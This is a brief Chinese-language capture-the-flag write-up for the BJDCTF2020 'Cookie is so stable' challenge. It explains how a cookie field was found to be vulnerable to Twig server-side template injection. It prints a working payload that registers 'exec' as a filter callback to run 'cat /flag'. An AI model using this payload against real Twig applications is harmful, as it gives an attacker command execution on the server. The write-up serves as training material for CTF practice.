详解模板注入漏洞
关于SSTI注入的一些理解
抓个包:
发现了两个包在cookie上的不同
判断是twig,经过测试发现是ssti注入
Payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
注释:如果不抓包在页面是无法获得flag的,应该有过滤
[BJDCTF2020]Cookie is so stable 1(twig模板注入)
最新推荐文章于 2024-06-13 07:36:50 发布